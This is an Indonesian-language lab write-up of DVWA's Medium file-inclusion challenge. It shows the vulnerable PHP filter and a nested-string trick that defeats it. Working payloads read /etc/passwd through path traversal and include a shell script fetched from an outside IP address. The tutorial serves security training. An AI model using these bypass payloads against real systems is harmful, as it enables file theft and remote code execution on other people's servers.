Medium
File Inclusion level Medium on DVWA
Di bawah ini adalah source-code dari file inclusion level Medium di DVWA.
vulnerabilities/fi/source/medium.php
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
Mencari Informasi
Kali ini jika kita kita menggunakan ../
atau ..\"
untuk LFI dan http://
atau https://
untuk RFI, maka yang teks yang mengandung kata tersebut akan dihilangkan oleh fungsi str_replace()
.
Untuk mengatasi hal ini saya menemukan cara, yaitu menggunakan payload berikut:
..././ -> ../ #hasil setelah dihilangkan
dan
hthttp://tp://0.0.0.0/RFI-Shell.txt -> http://0.0.0.0/RFI-Shell.txt #hasil setelah dihilangkan
Bagaimana? Apakah anda mengerti? Perhatikan pada payload ..././
, str_replace()
akan menghilangkan karakter ../
sehingga hasilnya menjadi ../
. Dan begitu juga yang RFI. Keren bukan? 😅
Atau kita juga bisa membuka file melalu direktori /
, seperti /etc/passwd seperti berikut:

Kita sebagai peretas memang harus kreatif untuk mengatasi berbagai masalah.😉
Melakukan Serangan
Oke, pada kali ini sepertinya kita tetap bisa melakukan LFI maupun RCI.
Local File Inclusion
Di sini saya contohkan mengakses file /etc/passwd menggunakan cara "mundur direktori", sehingga payload yang bisa digunakan adalah seperti berikut:
?page=..././..././..././..././..././etc/passwd

Dan hasilnya berhasil!
Remote File Inclusion
Dari informasi yang telah kita kumpulkan, payload yang akan kita gunakan saat ini adalah seperti berikut:
?page=hthttp://tp://18.215.230.19/RFI-shell.txt

Dan hasilnya shell bisa dijalankan.
Selamat kawan! Happy Hacking! 🍻
Last updated
Was this helpful?